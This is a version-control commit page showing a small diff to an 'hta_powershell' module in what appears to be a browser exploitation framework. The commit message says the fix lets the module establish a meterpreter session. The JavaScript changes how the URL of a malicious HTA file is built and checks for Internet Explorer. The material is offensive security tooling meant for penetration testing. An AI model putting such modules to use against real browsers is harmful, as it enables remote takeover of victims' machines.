Merge pull request #1125 from ReliaQuest-Labs/master

Fixed hta_powershell module so that it can establish a meterpreter session.
This commit is contained in:
Brendan Coles
2015-07-11 08:09:12 +10:00
2 changed files with 31 additions and 5 deletions

View File

@@ -6,7 +6,7 @@
beef.execute(function () {
var hta_url = '<%= @ps_url %>' + '/hta';
var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';
if (beef.browser.isIE()) {
// application='yes' is IE-only and needed to load the HTA into an IFrame.